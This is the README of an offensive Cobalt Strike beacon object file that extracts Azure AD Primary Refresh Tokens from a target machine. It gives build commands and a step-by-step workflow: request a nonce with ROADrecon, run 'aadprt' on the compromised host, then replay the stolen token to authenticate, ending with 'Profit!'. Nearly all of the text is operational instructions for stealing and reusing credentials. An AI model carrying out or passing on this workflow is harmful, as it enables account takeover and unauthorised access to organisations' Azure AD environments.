This bof allows Cobalt Strike to extract Azure AD PRT tokens from the machine. These tokens can then be used with tools like ROADTools to extract AAD information.
make
for the beacon object files
make test
for an executable
After compiling, load the aadprt.cna
file into Cobalt Strike.
- Request a nonce using ROADrecon:
roadrecon auth --prt-init
- Request a token on the target machine:
aadprt [NONCE]
- Use the token to authenticate in ROADrecon (or any other tool):
roadrecon auth --prt-cookie [TOKEN]
- Profit!
Heavily inspired by the awesome work and research of Dirk-jan and Lee.